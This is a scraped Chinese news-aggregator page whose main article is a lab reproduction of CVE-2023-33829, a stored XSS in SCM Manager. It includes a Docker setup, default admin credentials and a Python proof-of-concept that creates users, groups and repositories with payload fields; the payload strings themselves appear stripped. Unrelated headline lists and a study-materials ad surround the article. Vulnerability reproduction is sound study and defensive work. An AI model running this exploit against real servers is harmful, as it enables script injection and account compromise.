最新要闻
- 最高可抵6000元!苹果宣布Mac Studio等设备加入换购计划
- 今日讯!大厂中第一个对标ChatGPT 百度文心一言2个月来性能已提高50倍
- 拼了!35岁男子为考清华复读14年:没浪费教育资源 奖金仅够生活-天天快播
- 淄博夜空500架无人机助力高考:为学子加油 当前速递
- 聚焦:“牧马人同款大皮卡”全新Jeep角斗士谍照曝光
- 科林电气:中标3个国家电网采购项目,中标总金额约9475万元_新动态
- 智慧医疗让看病更便捷-新资讯
- 马斯克扔下车圈核弹:特斯拉FSD可以给其他车企用!-每日热点
- 小米又一爆款诞生!小米手环8国内出货破110万:上市不到俩月 全球短讯
- 价值或达500亿 国铁大规模采购动车组:350公里时速复兴号就有103组
- 疑似比亚迪F品牌官方账号成立:名为“方程豹汽车”
- 奇瑞杀疯了!5月销量近14万辆 一路反超吉利、长城
- 世界热讯:电解槽和氢能矿卡上榜内蒙古2023年技术装备首台(套)名单
- 小学生发现深沟露出车轮救人一命被网友点赞心细:老人驾老头乐失控导致
- 天天热点评!全球第一套!龙芯2K1500控制器不间断运行142天3408小时
- 喝酒去世网红家墙壁写着钱比命重要 网友唏嘘!家人:从没割过粉丝韭菜
手机
iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?
警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案
- iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?
- 警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案
- 男子被关545天申国赔:获赔18万多 驳回精神抚慰金
- 3天内26名本土感染者,辽宁确诊人数已超安徽
- 广西柳州一男子因纠纷杀害三人后自首
- 洱海坠机4名机组人员被批准为烈士 数千干部群众悼念
家电
消息!SCM Manager XSS漏洞复现(CVE-2023-33829)
一、漏洞描述
漏洞简述
SCM-Manager 是一款开源的版本库管理软件,同时支持 subversion、mercurial、git 的版本库管理。安装简单,功能较强,提供用户、用户组的权限管理 ,有丰富的插件支持。由于在MIT的许可下是开源的,因此它允许被用于商业用途,而且其代码可以在GitHub上获取到。该项目最初只是被用于研究目的,而在其2.0版本之后,被Cloudogu公司接手管理和开发了其各种代码库,以便为各个公司提供专业的企业级支持。
该漏洞主要为攻击者利用其多个功能的描述字段的代码缺陷,构造payload进行XSS攻击。
漏洞影响范围
供应商:Cloudogu
产品:SCM Manager
确认受影响版本:SCM Manager 1.2 <= 1.60
修复版本:>1.60 最新版本为2.43.1
二、漏洞复现实战
环境搭建
docker镜像:
https://bitbucket.org/sdorra/docker-scm-manager/src/master/
利用shell脚本搭建
shell:
#!/bin/bashmkdir /var/lib/scmchown 1000:1000 /var/lib/scmdocker run -v /var/lib/scm:/var/lib/scm -p 8080:8080 sdorra/scm-manager
漏洞复现
首先访问SCM Manager,需身份认证
Username : scmadmin Password: scmadmin
repositories
repository功能下Description字段该漏洞可利用
创建新repository,并payload进行利用
Git类型:
Subversion类型:
Users
User功能下Display Name字段该漏洞可利用
【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】
① 网安学习成长路径思维导图 ② 60+网安经典常用工具包 ③ 100+SRC漏洞分析报告 ④ 150+网安攻防实战技术电子书 ⑤ 最权威CISSP 认证考试指南+题库 ⑥ 超1800页CTF实战技巧手册 ⑦ 最新网安大厂面试题合集(含答案) ⑧ APP客户端安全检测指南(安卓+IOS)
创建新repository,并payload进行利用
可以看到新创建的账号中Display Name属性下显示异常,且XSS payload利用成功
Groups
Group功能下Description字段该漏洞可利用
另外可以根据POC进行利用
POC:
import requestsimport argparseimport sys# Main menuparser = argparse.ArgumentParser(description="CVE-2023-33829 exploit")parser.add_argument("-u", "--user", help="Admin user or user with write permissions")parser.add_argument("-p", "--password", help="password of the user")args = parser.parse_args()# Credentialsuser = sys.argv[2]password = sys.argv[4]# Global Variablesmain_url = "http://localhost:8080/scm" # Change URL if its necessaryauth_url = main_url + "/api/rest/authentication/login.json"users = main_url + "/api/rest/users.json"groups = main_url + "/api/rest/groups.json"repos = main_url + "/api/rest/repositories.json"# Create a sessionsession = requests.Session()# Credentials to sendpost_data={ "username": user, # change if you have any other user with write permissions "password": password # change if you have any other user with write permissions}r = session.post(auth_url, data=post_data)if r.status_code == 200: print("[+] Authentication successfully")else: print("[-] Failed to authenticate") sys.exit(1)new_user={ "name": "newUser", "displayName": "", "mail": "", "password": "", "admin": False, "active": True, "type": "xml"}create_user = session.post(users, json=new_user)print("[+] User with XSS Payload created")new_group={ "name": "newGroup", "description": "", "type": "xml"}create_group = session.post(groups, json=new_group)print("[+] Group with XSS Payload created")new_repo={ "name": "newRepo", "type": "svn", "contact": "", "description": "", "public": False}create_repo = session.post(repos, json=new_repo)print("[+] Repository with XSS Payload created")
漏洞修复
建议更新至SCM Manager最新版本,目前为2.43.1
结束语
本文主要介绍了CVE-2023-33829 SCM Manager XSS漏洞复现过程,漏洞主要体现于攻击者利用其多个功能的描述字段的代码缺陷,构造payload进行XSS攻击。
本漏洞可参考之处为敏感功能避免重复调用非敏感功能代码,并做好过滤与校验,进行必要的安全测试。
更多网安技能的在线实操练习,请点击这里>>
关键词:
每日头条!实际薪资水平低迷引发前景担忧 日债收益率周二普遍回落
【新华500】新华500指数(989001)6日跌1%
最高可抵6000元!苹果宣布Mac Studio等设备加入换购计划
今日讯!大厂中第一个对标ChatGPT 百度文心一言2个月来性能已提高50倍
拼了!35岁男子为考清华复读14年:没浪费教育资源 奖金仅够生活-天天快播
淄博夜空500架无人机助力高考:为学子加油 当前速递
聚焦:“牧马人同款大皮卡”全新Jeep角斗士谍照曝光
科林电气:中标3个国家电网采购项目,中标总金额约9475万元_新动态
环球观天下!在 Windows 系统上,你可以使用 Certbot 生成 Let's Encrypt 的泛域名证书。以下是具体步骤
焦点速看:如何让你的结构体更高效
【专为苛刻的数据环境而构建】上海道宁为您带来世界上先进的矢量原生、时间序列和实时分析数据库——kdb系列产品|世界新消息
天天快消息!提升生产线效率与质量:智慧工厂的优势与应用
Java-模板生成PDF方式2-PDFBox
智慧医疗让看病更便捷-新资讯
马斯克扔下车圈核弹:特斯拉FSD可以给其他车企用!-每日热点
小米又一爆款诞生!小米手环8国内出货破110万:上市不到俩月 全球短讯
价值或达500亿 国铁大规模采购动车组:350公里时速复兴号就有103组
疑似比亚迪F品牌官方账号成立:名为“方程豹汽车”
奇瑞杀疯了!5月销量近14万辆 一路反超吉利、长城
世界热讯:电解槽和氢能矿卡上榜内蒙古2023年技术装备首台(套)名单
Web安全-渗透测试-基础知识03
小学生发现深沟露出车轮救人一命被网友点赞心细:老人驾老头乐失控导致
天天热点评!全球第一套!龙芯2K1500控制器不间断运行142天3408小时
喝酒去世网红家墙壁写着钱比命重要 网友唏嘘!家人:从没割过粉丝韭菜
“宇宙猜想”CTO叶云出席元宇宙论坛并发表演讲
新品未能提振股价,苹果概念股跌幅扩大,华兴源创、长盈精密跌超15% 环球快讯
饶派杯 XCTF 车联网挑战赛 mqttsvr 复现|当前观点
【天天速看料】一条视频带你回忆高三这一年 网友感动:祝愿每位考生忙而不茫
《暗黑破坏神4》正式发售:标准版终于能玩了
苹果Vision Pro头戴支持近视用户:需额外掏钱买插片-世界观焦点
牛骨头汤有营养吗 牛骨头汤是否有营养
读改变未来的九大算法笔记05_数字签名
Git hooks与自动化部署-全球新消息
每日聚焦:直播平台源码画面质量功能的实现
云图说|ModelArts开发环境,让AI开发、探索、教学更简单 世界新要闻
苹果XR头显Vision Pro王炸登场:3499美元起售,2024年开卖-环球观天下
经常挖鼻孔会影响颜值 严重可诱发颅内感染
天天观热点:小米王腾分享苹果Vision Pro看法:令人赞叹、但普及需要时间
QQ空间18周岁 第一代美女网红鼻祖露面:16年没变样
压力给到合资品牌 上汽大众永久关停第一工厂:部分产线搬迁|全球要闻
全国爱眼日,王贾桥小学倡导学子保护视力、珍爱光明
linux tar解压命令总结
速讯:848中国鱼类资料图谱大全ACCESS\EXCEL数据库
顶象无感验证码助力京客隆提升数字化运营能力
MySQL用户与权限管理_每日热门
全球快播:电池级碳酸锂价格重回30万元/吨 锂盐厂商二季度业绩可期
抄底!百度网盘超级会员年卡178元:送优酷+喜马拉雅 世界实时
防止别人蹭热点 苹果Vision Pro完全不提元宇宙三个字
16.99万起!零重力座椅、无框车门、三种动力选择 长安深蓝S7即将上市
制作成本16.5亿!《封神三部曲》第一部定档:7月20日上映 焦点速读
天天消息!孙俪代言!超能双离子洗衣粉骨折价大促:39.9元11斤
国内卫浴二线品牌有哪些_国内卫浴二线品牌-最新
低利率环境与发行优势助推 商业银行绿色金融债发行火热
抽检合格率97.26%!江西加强中高考期间校园食品安全监管
阿根廷中国行 花30万可让梅西敬酒、合影?官方回应
续航2小时、仅售2万5!苹果首款AR眼镜开卖:还有半年时间攒钱
天天观天下!《暗黑4》德鲁伊玩家发声:不要随便攻击熊熊!
移动SSD也白菜价了!梵想PS2000 1TB只要279元 不到小米一半
天天日报丨天猫京东红包加码!最高23888元 每天最多领3次
阿根廷中国行 花30万可让梅西敬酒、合影?官方回应
在 Linux 中使用 sFTP 上传或下载文件与文件夹
日本工人的实际工资在4月份继续下降,尽管已经反映了在年度薪资谈判中所取得的加薪,这给考虑召集选举的首相岸田文雄带来挑战|天天时讯
环球速递!76核核显GPU足以毁天灭地 苹果Mac Pro不支持任何独显
今亮点!AMD确认锐龙8000明年问世:Zen5 CPU、亮机核显大升级
iPhone不用再说“嘿 Siri”了!可能不好用:用户担忧误唤醒_每日快讯
烤串巨无霸!广西烧烤竹签长1米8:网友直呼开眼 一串吃饱|热点评
精彩看点:李宁获摩根大通增持1117.05万股 最新持股比例为5.07%
全国中成药集采分组等多项信息公布 96家药企参与申报 多个品种竞争激烈
国际金融市场早知道:6月6日
取代iPhone?苹果发布首款MR头显Vision Pro:卖到2.5万天价
资讯:实用性看齐安卓?这就是iOS/iPad OS 17 苹果已推送测试版:iPhone 8、X被弃
天天简讯:《小美人鱼》全球票房突破3亿美元 黑美人鱼欢呼:大家还是爱看我的
独立在轨33天 状态良好:天舟五号与空间站组合体再次对接 时讯
7月14日上映!《碟中谍7》发布新剧照:59岁阿汤哥骑摩托冲下悬崖 头条焦点
龙岗生态司法修复基地揭牌 天天动态
24800元的苹果Vision Pro发布 一文看懂WWDC23有多硬!
母亲病危家人让高考孩子见最后一面 网友争议:高考高于亲情?|天天微速讯
天弘中证沪港深线上消费主题交易型开放式指数证券投资基金基金产品资料概要(更新)
环球热点!SD协议-时序
JAVA学习笔记_基础篇01
基于 log4j2 插件实现统一日志脱敏,性能远超正则替换-焦点信息
焦点观察:MRST绘制三维网格图
每日焦点!生态河湖 诗画江城
2.4万元!苹果首款MR头显Vision Pro发布:单眼像素超越4K电视
真颠覆XR!苹果Vision Pro技术、体验几乎完美 但是一根线毁所有|世界快报
苹果Mac三大新品国行价格汇总:巅峰顶配9.7万元-环球速看
8450米的珠峰上舍命救人 女子承诺1万美元只肯给4000美元:贵吗?
1100万年后 决定性别的Y染色体将消失:人类会怎么样?
旅游景区清洁工人工作情况影像记录带定位时间时间水印相机
全球动态:父母去世了,为子女买的保险能用遗产续费吗?
天天讯息:高中教材选修和必修有什么区别_高中必修是什么意思 选修呢
油毡纸多少钱一卷(油毡纸) 环球播资讯
当前短讯!不负如来不负卿txt下载完整版_不负如来不负卿txt下载
UFOU首获投资,升降桌售价上万元有人望而却步,孟振亮曾连续创业
每日短讯:管理能力有哪些方面_能力有哪些方面
阿里云宣布举办首届AI黑客马拉松挑战赛 最终获胜团队将获得3万奖金
现实题材电影《八角笼中》发布一“骗”真心版预告 由王宝强与肖央主演
人造电子皮肤首次亮相 每层主干均为长分子链组成
美国一男子连吃100天麦当劳后减重53斤 网友困惑垃圾食品是否需重新定义
巴奴火锅反向推出“天价土豆”套餐 套餐几乎囊括巴奴所有热门菜品